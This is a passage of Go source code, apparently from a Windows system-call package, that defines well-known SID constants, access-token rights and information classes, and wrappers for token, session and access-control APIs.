| // Various types of pre-specified SIDs that can be synthesized and compared at runtime. 323 | type WELL_KNOWN_SID_TYPE uint32 324 | 325 | const ( 326 | WinNullSid = 0 327 | WinWorldSid = 1 328 | WinLocalSid = 2 329 | WinCreatorOwnerSid = 3 330 | WinCreatorGroupSid = 4 331 | WinCreatorOwnerServerSid = 5 332 | WinCreatorGroupServerSid = 6 333 | WinNtAuthoritySid = 7 334 | WinDialupSid = 8 335 | WinNetworkSid = 9 336 | WinBatchSid = 10 337 | WinInteractiveSid = 11 338 | WinServiceSid = 12 339 | WinAnonymousSid = 13 340 | WinProxySid = 14 341 | WinEnterpriseControllersSid = 15 342 | WinSelfSid = 16 343 | WinAuthenticatedUserSid = 17 344 | WinRestrictedCodeSid = 18 345 | WinTerminalServerSid = 19 346 | WinRemoteLogonIdSid = 20 347 | WinLogonIdsSid = 21 348 | WinLocalSystemSid = 22 349 | WinLocalServiceSid = 23 350 | WinNetworkServiceSid = 24 351 | WinBuiltinDomainSid = 25 352 | WinBuiltinAdministratorsSid = 26 353 | WinBuiltinUsersSid = 27 354 | WinBuiltinGuestsSid = 28 355 | WinBuiltinPowerUsersSid = 29 356 | WinBuiltinAccountOperatorsSid = 30 357 | WinBuiltinSystemOperatorsSid = 31 358 | WinBuiltinPrintOperatorsSid = 32 359 | WinBuiltinBackupOperatorsSid = 33 360 | WinBuiltinReplicatorSid = 34 361 | WinBuiltinPreWindows2000CompatibleAccessSid = 35 362 | WinBuiltinRemoteDesktopUsersSid = 36 363 | WinBuiltinNetworkConfigurationOperatorsSid = 37 364 | WinAccountAdministratorSid = 38 365 | WinAccountGuestSid = 39 366 | WinAccountKrbtgtSid = 40 367 | WinAccountDomainAdminsSid = 41 368 | WinAccountDomainUsersSid = 42 369 | WinAccountDomainGuestsSid = 43 370 | WinAccountComputersSid = 44 371 | WinAccountControllersSid = 45 372 | WinAccountCertAdminsSid = 46 373 | WinAccountSchemaAdminsSid = 47 374 | WinAccountEnterpriseAdminsSid = 48 375 | WinAccountPolicyAdminsSid = 49 376 | WinAccountRasAndIasServersSid = 50 377 | WinNTLMAuthenticationSid = 51 378 | WinDigestAuthenticationSid = 52 379 | WinSChannelAuthenticationSid = 53 380 | WinThisOrganizationSid = 54 381 | WinOtherOrganizationSid = 55 382 | WinBuiltinIncomingForestTrustBuildersSid = 56 383 | WinBuiltinPerfMonitoringUsersSid = 57 384 | WinBuiltinPerfLoggingUsersSid = 58 385 | WinBuiltinAuthorizationAccessSid = 59 386 | WinBuiltinTerminalServerLicenseServersSid = 60 387 | WinBuiltinDCOMUsersSid = 61 388 | WinBuiltinIUsersSid = 62 389 | WinIUserSid = 63 390 | WinBuiltinCryptoOperatorsSid = 64 391 | WinUntrustedLabelSid = 65 392 | WinLowLabelSid = 66 393 | WinMediumLabelSid = 67 394 | WinHighLabelSid = 68 395 | WinSystemLabelSid = 69 396 | WinWriteRestrictedCodeSid = 70 397 | WinCreatorOwnerRightsSid = 71 398 | WinCacheablePrincipalsGroupSid = 72 399 | WinNonCacheablePrincipalsGroupSid = 73 400 | WinEnterpriseReadonlyControllersSid = 74 401 | WinAccountReadonlyControllersSid = 75 402 | WinBuiltinEventLogReadersGroup = 76 403 | WinNewEnterpriseReadonlyControllersSid = 77 404 | WinBuiltinCertSvcDComAccessGroup = 78 405 | WinMediumPlusLabelSid = 79 406 | WinLocalLogonSid = 80 407 | WinConsoleLogonSid = 81 408 | WinThisOrganizationCertificateSid = 82 409 | WinApplicationPackageAuthoritySid = 83 410 | WinBuiltinAnyPackageSid = 84 411 | WinCapabilityInternetClientSid = 85 412 | WinCapabilityInternetClientServerSid = 86 413 | WinCapabilityPrivateNetworkClientServerSid = 87 414 | WinCapabilityPicturesLibrarySid = 88 415 | WinCapabilityVideosLibrarySid = 89 416 | WinCapabilityMusicLibrarySid = 90 417 | WinCapabilityDocumentsLibrarySid = 91 418 | WinCapabilitySharedUserCertificatesSid = 92 419 | WinCapabilityEnterpriseAuthenticationSid = 93 420 | WinCapabilityRemovableStorageSid = 94 421 | WinBuiltinRDSRemoteAccessServersSid = 95 422 | WinBuiltinRDSEndpointServersSid = 96 423 | WinBuiltinRDSManagementServersSid = 97 424 | WinUserModeDriversSid = 98 425 | WinBuiltinHyperVAdminsSid = 99 426 | WinAccountCloneableControllersSid = 100 427 | WinBuiltinAccessControlAssistanceOperatorsSid = 101 428 | WinBuiltinRemoteManagementUsersSid = 102 429 | WinAuthenticationAuthorityAssertedSid = 103 430 | WinAuthenticationServiceAssertedSid = 104 431 | WinLocalAccountSid = 105 432 | WinLocalAccountAndAdministratorSid = 106 433 | WinAccountProtectedUsersSid = 107 434 | WinCapabilityAppointmentsSid = 108 435 | WinCapabilityContactsSid = 109 436 | WinAccountDefaultSystemManagedSid = 110 437 | WinBuiltinDefaultSystemManagedGroupSid = 111 438 | WinBuiltinStorageReplicaAdminsSid = 112 439 | WinAccountKeyAdminsSid = 113 440 | WinAccountEnterpriseKeyAdminsSid = 114 441 | WinAuthenticationKeyTrustSid = 115 442 | WinAuthenticationKeyPropertyMFASid = 116 443 | WinAuthenticationKeyPropertyAttestationSid = 117 444 | WinAuthenticationFreshKeyAuthSid = 118 445 | WinBuiltinDeviceOwnersSid = 119 446 | ) 447 | 448 | // Creates a SID for a well-known predefined alias, generally using the constants of the form 449 | // Win*Sid, for the local machine. 450 | func CreateWellKnownSid(sidType WELL_KNOWN_SID_TYPE) (*SID, error) { 451 | return CreateWellKnownDomainSid(sidType, nil) 452 | } 453 | 454 | // Creates a SID for a well-known predefined alias, generally using the constants of the form 455 | // Win*Sid, for the domain specified by the domainSid parameter. 456 | func CreateWellKnownDomainSid(sidType WELL_KNOWN_SID_TYPE, domainSid *SID) (*SID, error) { 457 | n := uint32(50) 458 | for { 459 | b := make([]byte, n) 460 | sid := (*SID)(unsafe.Pointer(&b[0])) 461 | err := createWellKnownSid(sidType, domainSid, sid, &n) 462 | if err == nil { 463 | return sid, nil 464 | } 465 | if err != ERROR_INSUFFICIENT_BUFFER { 466 | return nil, err 467 | } 468 | if n <= uint32(len(b)) { 469 | return nil, err 470 | } 471 | } 472 | } 473 | 474 | const ( 475 | // do not reorder 476 | TOKEN_ASSIGN_PRIMARY = 1 << iota 477 | TOKEN_DUPLICATE 478 | TOKEN_IMPERSONATE 479 | TOKEN_QUERY 480 | TOKEN_QUERY_SOURCE 481 | TOKEN_ADJUST_PRIVILEGES 482 | TOKEN_ADJUST_GROUPS 483 | TOKEN_ADJUST_DEFAULT 484 | TOKEN_ADJUST_SESSIONID 485 | 486 | TOKEN_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | 487 | TOKEN_ASSIGN_PRIMARY | 488 | TOKEN_DUPLICATE | 489 | TOKEN_IMPERSONATE | 490 | TOKEN_QUERY | 491 | TOKEN_QUERY_SOURCE | 492 | TOKEN_ADJUST_PRIVILEGES | 493 | TOKEN_ADJUST_GROUPS | 494 | TOKEN_ADJUST_DEFAULT | 495 | TOKEN_ADJUST_SESSIONID 496 | TOKEN_READ = STANDARD_RIGHTS_READ | TOKEN_QUERY 497 | TOKEN_WRITE = STANDARD_RIGHTS_WRITE | 498 | TOKEN_ADJUST_PRIVILEGES | 499 | TOKEN_ADJUST_GROUPS | 500 | TOKEN_ADJUST_DEFAULT 501 | TOKEN_EXECUTE = STANDARD_RIGHTS_EXECUTE 502 | ) 503 | 504 | const ( 505 | // do not reorder 506 | TokenUser = 1 + iota 507 | TokenGroups 508 | TokenPrivileges 509 | TokenOwner 510 | TokenPrimaryGroup 511 | TokenDefaultDacl 512 | TokenSource 513 | TokenType 514 | TokenImpersonationLevel 515 | TokenStatistics 516 | TokenRestrictedSids 517 | TokenSessionId 518 | TokenGroupsAndPrivileges 519 | TokenSessionReference 520 | TokenSandBoxInert 521 | TokenAuditPolicy 522 | TokenOrigin 523 | TokenElevationType 524 | TokenLinkedToken 525 | TokenElevation 526 | TokenHasRestrictions 527 | TokenAccessInformation 528 | TokenVirtualizationAllowed 529 | TokenVirtualizationEnabled 530 | TokenIntegrityLevel 531 | TokenUIAccess 532 | TokenMandatoryPolicy 533 | TokenLogonSid 534 | MaxTokenInfoClass 535 | ) 536 | 537 | // Group attributes inside of Tokengroups.Groups[i].Attributes 538 | const ( 539 | SE_GROUP_MANDATORY = 0x00000001 540 | SE_GROUP_ENABLED_BY_DEFAULT = 0x00000002 541 | SE_GROUP_ENABLED = 0x00000004 542 | SE_GROUP_OWNER = 0x00000008 543 | SE_GROUP_USE_FOR_DENY_ONLY = 0x00000010 544 | SE_GROUP_INTEGRITY = 0x00000020 545 | SE_GROUP_INTEGRITY_ENABLED = 0x00000040 546 | SE_GROUP_LOGON_ID = 0xC0000000 547 | SE_GROUP_RESOURCE = 0x20000000 548 | SE_GROUP_VALID_ATTRIBUTES = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED | SE_GROUP_OWNER | SE_GROUP_USE_FOR_DENY_ONLY | SE_GROUP_LOGON_ID | SE_GROUP_RESOURCE | SE_GROUP_INTEGRITY | SE_GROUP_INTEGRITY_ENABLED 549 | ) 550 | 551 | // Privilege attributes 552 | const ( 553 | SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001 554 | SE_PRIVILEGE_ENABLED = 0x00000002 555 | SE_PRIVILEGE_REMOVED = 0x00000004 556 | SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000 557 | SE_PRIVILEGE_VALID_ATTRIBUTES = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED | SE_PRIVILEGE_REMOVED | SE_PRIVILEGE_USED_FOR_ACCESS 558 | ) 559 | 560 | // Token types 561 | const ( 562 | TokenPrimary = 1 563 | TokenImpersonation = 2 564 | ) 565 | 566 | // Impersonation levels 567 | const ( 568 | SecurityAnonymous = 0 569 | SecurityIdentification = 1 570 | SecurityImpersonation = 2 571 | SecurityDelegation = 3 572 | ) 573 | 574 | type LUID struct { 575 | LowPart uint32 576 | HighPart int32 577 | } 578 | 579 | type LUIDAndAttributes struct { 580 | Luid LUID 581 | Attributes uint32 582 | } 583 | 584 | type SIDAndAttributes struct { 585 | Sid *SID 586 | Attributes uint32 587 | } 588 | 589 | type Tokenuser struct { 590 | User SIDAndAttributes 591 | } 592 | 593 | type Tokenprimarygroup struct { 594 | PrimaryGroup *SID 595 | } 596 | 597 | type Tokengroups struct { 598 | GroupCount uint32 599 | Groups [1]SIDAndAttributes // Use AllGroups() for iterating. 600 | } 601 | 602 | // AllGroups returns a slice that can be used to iterate over the groups in g. 603 | func (g *Tokengroups) AllGroups() []SIDAndAttributes { 604 | return (*[(1 << 28) - 1]SIDAndAttributes)(unsafe.Pointer(&g.Groups[0]))[:g.GroupCount:g.GroupCount] 605 | } 606 | 607 | type Tokenprivileges struct { 608 | PrivilegeCount uint32 609 | Privileges [1]LUIDAndAttributes // Use AllPrivileges() for iterating. 610 | } 611 | 612 | // AllPrivileges returns a slice that can be used to iterate over the privileges in p. 613 | func (p *Tokenprivileges) AllPrivileges() []LUIDAndAttributes { 614 | return (*[(1 << 27) - 1]LUIDAndAttributes)(unsafe.Pointer(&p.Privileges[0]))[:p.PrivilegeCount:p.PrivilegeCount] 615 | } 616 | 617 | type Tokenmandatorylabel struct { 618 | Label SIDAndAttributes 619 | } 620 | 621 | func (tml *Tokenmandatorylabel) Size() uint32 { 622 | return uint32(unsafe.Sizeof(Tokenmandatorylabel{})) + GetLengthSid(tml.Label.Sid) 623 | } 624 | 625 | // Authorization Functions 626 | //sys checkTokenMembership(tokenHandle Token, sidToCheck *SID, isMember *int32) (err error) = advapi32.CheckTokenMembership 627 | //sys OpenProcessToken(process Handle, access uint32, token *Token) (err error) = advapi32.OpenProcessToken 628 | //sys OpenThreadToken(thread Handle, access uint32, openAsSelf bool, token *Token) (err error) = advapi32.OpenThreadToken 629 | //sys ImpersonateSelf(impersonationlevel uint32) (err error) = advapi32.ImpersonateSelf 630 | //sys RevertToSelf() (err error) = advapi32.RevertToSelf 631 | //sys SetThreadToken(thread *Handle, token Token) (err error) = advapi32.SetThreadToken 632 | //sys LookupPrivilegeValue(systemname *uint16, name *uint16, luid *LUID) (err error) = advapi32.LookupPrivilegeValueW 633 | //sys AdjustTokenPrivileges(token Token, disableAllPrivileges bool, newstate *Tokenprivileges, buflen uint32, prevstate *Tokenprivileges, returnlen *uint32) (err error) = advapi32.AdjustTokenPrivileges 634 | //sys AdjustTokenGroups(token Token, resetToDefault bool, newstate *Tokengroups, buflen uint32, prevstate *Tokengroups, returnlen *uint32) (err error) = advapi32.AdjustTokenGroups 635 | //sys GetTokenInformation(token Token, infoClass uint32, info *byte, infoLen uint32, returnedLen *uint32) (err error) = advapi32.GetTokenInformation 636 | //sys SetTokenInformation(token Token, infoClass uint32, info *byte, infoLen uint32) (err error) = advapi32.SetTokenInformation 637 | //sys DuplicateTokenEx(existingToken Token, desiredAccess uint32, tokenAttributes *SecurityAttributes, impersonationLevel uint32, tokenType uint32, newToken *Token) (err error) = advapi32.DuplicateTokenEx 638 | //sys GetUserProfileDirectory(t Token, dir *uint16, dirLen *uint32) (err error) = userenv.GetUserProfileDirectoryW 639 | //sys getSystemDirectory(dir *uint16, dirLen uint32) (len uint32, err error) = kernel32.GetSystemDirectoryW 640 | //sys getWindowsDirectory(dir *uint16, dirLen uint32) (len uint32, err error) = kernel32.GetWindowsDirectoryW 641 | //sys getSystemWindowsDirectory(dir *uint16, dirLen uint32) (len uint32, err error) = kernel32.GetSystemWindowsDirectoryW 642 | 643 | // An access token contains the security information for a logon session. 644 | // The system creates an access token when a user logs on, and every 645 | // process executed on behalf of the user has a copy of the token. 646 | // The token identifies the user, the user's groups, and the user's 647 | // privileges. The system uses the token to control access to securable 648 | // objects and to control the ability of the user to perform various 649 | // system-related operations on the local computer. 650 | type Token Handle 651 | 652 | // OpenCurrentProcessToken opens an access token associated with current 653 | // process with TOKEN_QUERY access. It is a real token that needs to be closed. 654 | // 655 | // Deprecated: Explicitly call OpenProcessToken(CurrentProcess(), ...) 656 | // with the desired access instead, or use GetCurrentProcessToken for a 657 | // TOKEN_QUERY token. 658 | func OpenCurrentProcessToken() (Token, error) { 659 | var token Token 660 | err := OpenProcessToken(CurrentProcess(), TOKEN_QUERY, &token) 661 | return token, err 662 | } 663 | 664 | // GetCurrentProcessToken returns the access token associated with 665 | // the current process. It is a pseudo token that does not need 666 | // to be closed. 667 | func GetCurrentProcessToken() Token { 668 | return Token(^uintptr(4 - 1)) 669 | } 670 | 671 | // GetCurrentThreadToken return the access token associated with 672 | // the current thread. It is a pseudo token that does not need 673 | // to be closed. 674 | func GetCurrentThreadToken() Token { 675 | return Token(^uintptr(5 - 1)) 676 | } 677 | 678 | // GetCurrentThreadEffectiveToken returns the effective access token 679 | // associated with the current thread. It is a pseudo token that does 680 | // not need to be closed. 681 | func GetCurrentThreadEffectiveToken() Token { 682 | return Token(^uintptr(6 - 1)) 683 | } 684 | 685 | // Close releases access to access token. 686 | func (t Token) Close() error { 687 | return CloseHandle(Handle(t)) 688 | } 689 | 690 | // getInfo retrieves a specified type of information about an access token. 691 | func (t Token) getInfo(class uint32, initSize int) (unsafe.Pointer, error) { 692 | n := uint32(initSize) 693 | for { 694 | b := make([]byte, n) 695 | e := GetTokenInformation(t, class, &b[0], uint32(len(b)), &n) 696 | if e == nil { 697 | return unsafe.Pointer(&b[0]), nil 698 | } 699 | if e != ERROR_INSUFFICIENT_BUFFER { 700 | return nil, e 701 | } 702 | if n <= uint32(len(b)) { 703 | return nil, e 704 | } 705 | } 706 | } 707 | 708 | // GetTokenUser retrieves access token t user account information. 709 | func (t Token) GetTokenUser() (*Tokenuser, error) { 710 | i, e := t.getInfo(TokenUser, 50) 711 | if e != nil { 712 | return nil, e 713 | } 714 | return (*Tokenuser)(i), nil 715 | } 716 | 717 | // GetTokenGroups retrieves group accounts associated with access token t. 718 | func (t Token) GetTokenGroups() (*Tokengroups, error) { 719 | i, e := t.getInfo(TokenGroups, 50) 720 | if e != nil { 721 | return nil, e 722 | } 723 | return (*Tokengroups)(i), nil 724 | } 725 | 726 | // GetTokenPrimaryGroup retrieves access token t primary group information. 727 | // A pointer to a SID structure representing a group that will become 728 | // the primary group of any objects created by a process using this access token. 729 | func (t Token) GetTokenPrimaryGroup() (*Tokenprimarygroup, error) { 730 | i, e := t.getInfo(TokenPrimaryGroup, 50) 731 | if e != nil { 732 | return nil, e 733 | } 734 | return (*Tokenprimarygroup)(i), nil 735 | } 736 | 737 | // GetUserProfileDirectory retrieves path to the 738 | // root directory of the access token t user's profile. 739 | func (t Token) GetUserProfileDirectory() (string, error) { 740 | n := uint32(100) 741 | for { 742 | b := make([]uint16, n) 743 | e := GetUserProfileDirectory(t, &b[0], &n) 744 | if e == nil { 745 | return UTF16ToString(b), nil 746 | } 747 | if e != ERROR_INSUFFICIENT_BUFFER { 748 | return "", e 749 | } 750 | if n <= uint32(len(b)) { 751 | return "", e 752 | } 753 | } 754 | } 755 | 756 | // IsElevated returns whether the current token is elevated from a UAC perspective. 757 | func (token Token) IsElevated() bool { 758 | var isElevated uint32 759 | var outLen uint32 760 | err := GetTokenInformation(token, TokenElevation, (*byte)(unsafe.Pointer(&isElevated)), uint32(unsafe.Sizeof(isElevated)), &outLen) 761 | if err != nil { 762 | return false 763 | } 764 | return outLen == uint32(unsafe.Sizeof(isElevated)) && isElevated != 0 765 | } 766 | 767 | // GetLinkedToken returns the linked token, which may be an elevated UAC token. 768 | func (token Token) GetLinkedToken() (Token, error) { 769 | var linkedToken Token 770 | var outLen uint32 771 | err := GetTokenInformation(token, TokenLinkedToken, (*byte)(unsafe.Pointer(&linkedToken)), uint32(unsafe.Sizeof(linkedToken)), &outLen) 772 | if err != nil { 773 | return Token(0), err 774 | } 775 | return linkedToken, nil 776 | } 777 | 778 | // GetSystemDirectory retrieves the path to current location of the system 779 | // directory, which is typically, though not always, `C:\Windows\System32`. 780 | func GetSystemDirectory() (string, error) { 781 | n := uint32(MAX_PATH) 782 | for { 783 | b := make([]uint16, n) 784 | l, e := getSystemDirectory(&b[0], n) 785 | if e != nil { 786 | return "", e 787 | } 788 | if l <= n { 789 | return UTF16ToString(b[:l]), nil 790 | } 791 | n = l 792 | } 793 | } 794 | 795 | // GetWindowsDirectory retrieves the path to current location of the Windows 796 | // directory, which is typically, though not always, `C:\Windows`. This may 797 | // be a private user directory in the case that the application is running 798 | // under a terminal server. 799 | func GetWindowsDirectory() (string, error) { 800 | n := uint32(MAX_PATH) 801 | for { 802 | b := make([]uint16, n) 803 | l, e := getWindowsDirectory(&b[0], n) 804 | if e != nil { 805 | return "", e 806 | } 807 | if l <= n { 808 | return UTF16ToString(b[:l]), nil 809 | } 810 | n = l 811 | } 812 | } 813 | 814 | // GetSystemWindowsDirectory retrieves the path to current location of the 815 | // Windows directory, which is typically, though not always, `C:\Windows`. 816 | func GetSystemWindowsDirectory() (string, error) { 817 | n := uint32(MAX_PATH) 818 | for { 819 | b := make([]uint16, n) 820 | l, e := getSystemWindowsDirectory(&b[0], n) 821 | if e != nil { 822 | return "", e 823 | } 824 | if l <= n { 825 | return UTF16ToString(b[:l]), nil 826 | } 827 | n = l 828 | } 829 | } 830 | 831 | // IsMember reports whether the access token t is a member of the provided SID. 832 | func (t Token) IsMember(sid *SID) (bool, error) { 833 | var b int32 834 | if e := checkTokenMembership(t, sid, &b); e != nil { 835 | return false, e 836 | } 837 | return b != 0, nil 838 | } 839 | 840 | const ( 841 | WTS_CONSOLE_CONNECT = 0x1 842 | WTS_CONSOLE_DISCONNECT = 0x2 843 | WTS_REMOTE_CONNECT = 0x3 844 | WTS_REMOTE_DISCONNECT = 0x4 845 | WTS_SESSION_LOGON = 0x5 846 | WTS_SESSION_LOGOFF = 0x6 847 | WTS_SESSION_LOCK = 0x7 848 | WTS_SESSION_UNLOCK = 0x8 849 | WTS_SESSION_REMOTE_CONTROL = 0x9 850 | WTS_SESSION_CREATE = 0xa 851 | WTS_SESSION_TERMINATE = 0xb 852 | ) 853 | 854 | const ( 855 | WTSActive = 0 856 | WTSConnected = 1 857 | WTSConnectQuery = 2 858 | WTSShadow = 3 859 | WTSDisconnected = 4 860 | WTSIdle = 5 861 | WTSListen = 6 862 | WTSReset = 7 863 | WTSDown = 8 864 | WTSInit = 9 865 | ) 866 | 867 | type WTSSESSION_NOTIFICATION struct { 868 | Size uint32 869 | SessionID uint32 870 | } 871 | 872 | type WTS_SESSION_INFO struct { 873 | SessionID uint32 874 | WindowStationName *uint16 875 | State uint32 876 | } 877 | 878 | //sys WTSQueryUserToken(session uint32, token *Token) (err error) = wtsapi32.WTSQueryUserToken 879 | //sys WTSEnumerateSessions(handle Handle, reserved uint32, version uint32, sessions **WTS_SESSION_INFO, count *uint32) (err error) = wtsapi32.WTSEnumerateSessionsW 880 | //sys WTSFreeMemory(ptr uintptr) = wtsapi32.WTSFreeMemory 881 | 882 | type ACL struct { 883 | aclRevision byte 884 | sbz1 byte 885 | aclSize uint16 886 | aceCount uint16 887 | sbz2 uint16 888 | } 889 | 890 | type SECURITY_DESCRIPTOR struct { 891 | revision byte 892 | sbz1 byte 893 | control SECURITY_DESCRIPTOR_CONTROL 894 | owner *SID 895 | group *SID 896 | sacl *ACL 897 | dacl *ACL 898 | } 899 | 900 | type SecurityAttributes struct { 901 | Length uint32 902 | SecurityDescriptor *SECURITY_DESCRIPTOR 903 | InheritHandle uint32 904 | } 905 | 906 | type SE_OBJECT_TYPE uint32 907 | 908 | // Constants for type SE_OBJECT_TYPE 909 | const ( 910 | SE_UNKNOWN_OBJECT_TYPE = 0 911 | SE_FILE_OBJECT = 1 912 | SE_SERVICE = 2 913 | SE_PRINTER = 3 914 | SE_REGISTRY_KEY = 4 915 | SE_LMSHARE = 5 916 | SE_KERNEL_OBJECT = 6 917 | SE_WINDOW_OBJECT = 7 918 | SE_DS_OBJECT = 8 919 | SE_DS_OBJECT_ALL = 9 920 | SE_PROVIDER_DEFINED_OBJECT = 10 921 | SE_WMIGUID_OBJECT = 11 922 | SE_REGISTRY_WOW64_32KEY = 12 923 | SE_REGISTRY_WOW64_64KEY = 13 924 | ) 925 | 926 | type SECURITY_INFORMATION uint32 927 | 928 | // Constants for type SECURITY_INFORMATION 929 | const ( 930 | OWNER_SECURITY_INFORMATION = 0x00000001 931 | GROUP_SECURITY_INFORMATION = 0x00000002 932 | DACL_SECURITY_INFORMATION = 0x00000004 933 | SACL_SECURITY_INFORMATION = 0x00000008 934 | LABEL_SECURITY_INFORMATION = 0x00000010 935 | ATTRIBUTE_SECURITY_INFORMATION = 0x00000020 936 | SCOPE_SECURITY_INFORMATION = 0x00000040 937 | BACKUP_SECURITY_INFORMATION = 0x00010000 938 | PROTECTED_DACL_SECURITY_INFORMATION = 0x80000000 939 | PROTECTED_SACL_SECURITY_INFORMATION = 0x40000000 940 | UNPROTECTED_DACL_SECURITY_INFORMATION = 0x20000000 941 | UNPROTECTED_SACL_SECURITY_INFORMATION = 0x10000000 942 | ) 943 | 944 | type SECURITY_DESCRIPTOR_CONTROL uint16 945 | 946 | // Constants for type SECURITY_DESCRIPTOR_CONTROL 947 | const ( 948 | SE_OWNER_DEFAULTED = 0x0001 949 | SE_GROUP_DEFAULTED = 0x0002 950 | SE_DACL_PRESENT = 0x0004 951 | SE_DACL_DEFAULTED = 0x0008 952 | SE_SACL_PRESENT = 0x0010 953 | SE_SACL_DEFAULTED = 0x0020 954 | SE_DACL_AUTO_INHERIT_REQ = 0x0100 955 | SE_SACL_AUTO_INHERIT_REQ = 0x0200 956 | SE_DACL_AUTO_INHERITED = 0x0400 957 | SE_SACL_AUTO_INHERITED = 0x0800 958 | SE_DACL_PROTECTED = 0x1000 959 | SE_SACL_PROTECTED = 0x2000 960 | SE_RM_CONTROL_VALID = 0x4000 961 | SE_SELF_RELATIVE = 0x8000 962 | ) 963 | 964 | type ACCESS_MASK uint32 965 | 966 | // Constants for type ACCESS_MASK 967 | const ( 968 | DELETE = 0x00010000 969 | READ_CONTROL = 0x00020000 970 | WRITE_DAC = 0x00040000 971 | WRITE_OWNER = 0x00080000 972 | SYNCHRONIZE = 0x00100000 973 | STANDARD_RIGHTS_REQUIRED = 0x000F0000 974 | STANDARD_RIGHTS_READ = READ_CONTROL 975 | STANDARD_RIGHTS_WRITE = READ_CONTROL 976 | STANDARD_RIGHTS_EXECUTE = READ_CONTROL 977 | STANDARD_RIGHTS_ALL = 0x001F0000 978 | SPECIFIC_RIGHTS_ALL = 0x0000FFFF 979 | ACCESS_SYSTEM_SECURITY = 0x01000000 980 | MAXIMUM_ALLOWED = 0x02000000 981 | GENERIC_READ = 0x80000000 982 | GENERIC_WRITE = 0x40000000 983 | GENERIC_EXECUTE = 0x20000000 984 | GENERIC_ALL = 0x10000000 985 | ) 986 | 987 | type ACCESS_MODE uint32 988 | 989 | // Constants for type ACCESS_MODE 990 | const ( 991 | NOT_USED_ACCESS = 0 992 | GRANT_ACCESS = 1 993 | SET_ACCESS = 2 994 | DENY_ACCESS = 3 995 | REVOKE_ACCESS = 4 996 | SET_AUDIT_SUCCESS = 5 997 | SET_AUDIT_FAILURE = 6 998 | ) 999 | 1000 | // Constants for AceFlags and Inheritance fields 1001 | const ( 1002 | NO_INHERITANCE = 0x0 1003 | SUB_OBJECTS_ONLY_INHERIT = 0x1 1004 | SUB_CONTAINERS_ONLY_INHERIT = 0x2 1005 | SUB_CONTAINERS_AND_OBJECTS_INHERIT = 0x3 1006 | INHERIT_NO_PROPAGATE = 0x4 1007 | INHERIT_ONLY = 0x8 1008 | INHERITED_ACCESS_ENTRY = 0x10 1009 | INHERITED_PARENT = 0x10000000 1010 | INHERITED_GRANDPARENT = 0x20000000 1011 | OBJECT_INHERIT_ACE = 0x1 1012 | CONTAINER_INHERIT_ACE = 0x2 1013 | NO_PROPAGATE_INHERIT_ACE = 0x4 1014 | INHERIT_ONLY_ACE = 0x8 1015 | INHERITED_ACE = 0x10 1016 | VALID_INHERIT_FLAGS = 0x1F 1017 | ) 1018 | 1019 | type MULTIPLE_TRUSTEE_OPERATION uint32 1020 | 1021 | // Constants for MULTIPLE_TRUSTEE_OPERATION 1022 | const ( 1023 | NO_MULTIPLE_TRUSTEE = 0 1024 | TRUSTEE_IS_IMPERSONATE = 1 1025 | ) 1026 | 1027 | type TRUSTEE_FORM uint32 1028 | 1029 | // Constants for TRUSTEE_FORM 1030 | const ( 1031 | TRUSTEE_IS_SID = 0 1032 | TRUSTEE_IS_NAME = 1 1033 | TRUSTEE_BAD_FORM = 2 1034 | TRUSTEE_IS_OBJECTS_AND_SID = 3 1035 | TRUSTEE_IS_OBJECTS_AND_NAME = 4 1036 | ) 1037 | 1038 | type TRUSTEE_TYPE uint32 1039 | 1040 | // Constants for TRUSTEE_TYPE 1041 | const ( 1042 | TRUSTEE_IS_UNKNOWN = 0 1043 | TRUSTEE_IS_USER = 1 1044 | TRUSTEE_IS_GROUP = 2 1045 | TRUSTEE_IS_DOMAIN = 3 1046 | TRUSTEE_IS_ALIAS = 4 1047 | TRUSTEE_IS_WELL_KNOWN_GROUP = 5 1048 | TRUSTEE_IS_DELETED = 6 1049 | TRUSTEE_IS_INVALID = 7 1050 | TRUSTEE_IS_COMPUTER = 8 1051 | ) 1052 | 1053 | // Constants for ObjectsPresent field 1054 | const ( 1055 | ACE_OBJECT_TYPE_PRESENT = 0x1 1056 | ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x2 1057 | ) 1058 | 1059 | type EXPLICIT_ACCESS struct { 1060 | AccessPermissions ACCESS_MASK 1061 | AccessMode ACCESS_MODE 1062 | Inheritance uint32 1063 | Trustee TRUSTEE 1064 | } 1065 | 1066 | // This type is the union inside of TRUSTEE and must be created using one of the TrusteeValueFrom* functions. 1067 | type TrusteeValue uintptr 1068 | 1069 | func TrusteeValueFromString(str string) TrusteeValue { 1070 | return TrusteeValue(unsafe.Pointer(StringToUTF16Ptr(str))) 1071 | } 1072 | func TrusteeValueFromSID(sid *SID) TrusteeValue { 1073 | return TrusteeValue(unsafe.Pointer(sid)) 1074 | } 1075 | func TrusteeValueFromObjectsAndSid(objectsAndSid *OBJECTS_AND_SID) TrusteeValue { 1076 | return TrusteeValue(unsafe.Pointer(objectsAndSid)) 1077 | } 1078 | func TrusteeValueFromObjectsAndName(objectsAndName *OBJECTS_AND_NAME) TrusteeValue { 1079 | return TrusteeValue(unsafe.Pointer(objectsAndName)) 1080 | } 1081 | 1082 | type TRUSTEE struct { 1083 | MultipleTrustee *TRUSTEE 1084 | MultipleTrusteeOperation MULTIPLE_TRUSTEE_OPERATION 1085 | TrusteeForm TRUSTEE_FORM 1086 | TrusteeType TRUSTEE_TYPE 1087 | TrusteeValue TrusteeValue 1088 | } 1089 | 1090 | type OBJECTS_AND_SID struct { 1091 | ObjectsPresent uint32 1092 | ObjectTypeGuid GUID 1093 | InheritedObjectTypeGuid GUID 1094 | Sid *SID 1095 | } 1096 | 1097 | type OBJECTS_AND_NAME struct { 1098 | ObjectsPresent uint32 1099 | ObjectType SE_OBJECT_TYPE 1100 | ObjectTypeName *uint16 1101 | InheritedObjectTypeName *uint16 1102 | Name *uint16 1103 | } 1104 | 1105 | //sys getSecurityInfo(handle Handle, objectType SE_OBJECT_TYPE, securityInformation SECURITY_INFORMATION, owner **SID, group **SID, dacl **ACL, sacl **ACL, sd **SECURITY_DESCRIPTOR) (ret error) = advapi32.GetSecurityInfo 1106 | //sys SetSecurityInfo(handle Handle, objectType SE_OBJECT_TYPE, securityInformation SECURITY_INFORMATION, owner *SID, group *SID, dacl *ACL, sacl *ACL) = advapi32.SetSecurityInfo 1107 | //sys 